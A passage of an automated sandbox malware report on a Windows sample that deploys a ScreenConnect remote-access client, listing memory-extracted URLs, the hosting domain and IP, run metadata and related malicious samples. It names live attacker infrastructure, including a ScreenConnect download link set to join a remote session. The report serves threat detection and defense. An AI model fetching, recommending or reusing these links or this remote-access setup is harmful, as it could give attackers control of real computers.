                                                                                        https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.applicationPdfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdnc#svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://secure.stansup.com/Bin/ScreenConnect.Client.applicationScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuersvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application34e089ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.2909498559.000002A10001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3288065688.00000000019DF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Cdfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://Passport.NET/tb_svchost.exe, 00000007.00000002.3285134135.000002487ACC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://secure.stansup.com/Bin/ScreenConnect.Client.applicationKyScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configLdfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuersvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://account.live.com/msangcwamsvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063568750.000002487B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.w3.ordfsvc.exe, 00000001.00000002.2909498559.000002A10051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10053D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://crl.ver)svchost.exe, 00000006.00000002.3287569710.00000246CF8B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285134135.000002487ACDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.applicationnScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://passport.net/tbsvchost.exe, 00000007.00000002.3286034426.000002487BCA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://secure.staPdfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds/wwwsvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://secure.staPxdfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Windodfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or76GEJ2UX.log.1.drfalse
                                                                                                                                              		unknown
                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80601ssuersvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scRsvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285900941.000002487BC5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuersvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exXdfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustmsvchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://secure.stansup.com/Bndfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowScreenConnect.WindowsClient.exe, 00000009.00000002.2423013752.000000001B7DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/scicysvchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe0dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exexdfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://Passport.NET/STSsvchost.exe, 00000007.00000003.2203491408.000002487B579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xmlsvchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2909498559.000002A10008D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.dll#dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuersvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.applicat3coxOaV92n.exe, 00000000.00000002.2298053850.0000000000E5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.w3.odfsvc.exe, 00000001.00000002.2909498559.000002A10051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://account.live.cosvchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://Passport.NET/tbsvchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284820423.000002487AC74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281238846.000002487BCFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.2166034498.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165600632.000002487B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165712864.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166852109.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165629059.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186944592.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166897807.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167337468.000002487B50E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://signup.live.com/signup.aspxsvchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdOAPFsvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://login.microsoftonline.com/MSARST2.srfHsvchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.application899ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              79.110.49.185
                                                                                                                                                                                                              		secure.stansup.comGermany
                                                                                                                                                                                                              		57287OTAVANET-ASCZfalse

                                                                                                                                                                                                              Private

                                                                                                                                                                                                              IP
                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1542318
                                                                                                                                                                                                              Start date and time:2024-10-25 19:28:24 +02:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 8m 19s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:15
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:3coxOaV92n.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:8b6c29b6418b96950df0f4d56e90f1d1b25c08ced164e8a3f83b61601a674c71.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal60.evad.winEXE@20/79@2/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 85.7%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 70%
                                                                                                                                                                                                              • Number of executed functions: 206
                                                                                                                                                                                                              • Number of non-executed functions: 28
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 40.126.32.72, 40.126.32.138, 40.126.32.134, 20.190.160.22, 40.126.32.136, 40.126.32.140, 20.190.160.20, 40.126.32.133, 84.201.210.18, 192.229.221.95, 184.28.90.27, 52.168.117.173, 199.232.210.172, 93.184.221.240
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                              • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 5244 because it is empty
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: 3coxOaV92n.exe

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              13:29:13API Interceptor179868x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                              13:29:13API Interceptor1x Sleep call for process: 3coxOaV92n.exe modified
                                                                                                                                                                                                              13:29:15API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                              13:29:40API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              79.110.49.185Qjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                  e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                    96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                      xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                        EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                          X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                            AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  secure.stansup.comQjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comQjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.21
                                                                                                                                                                                                                                  khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 84.201.210.34
                                                                                                                                                                                                                                  xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.18
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.18
                                                                                                                                                                                                                                  https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.19
                                                                                                                                                                                                                                  https://thegramp.nimbusweb.me/share/11336505/nigrk0yirmsg8qt4s4nmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 217.20.57.25
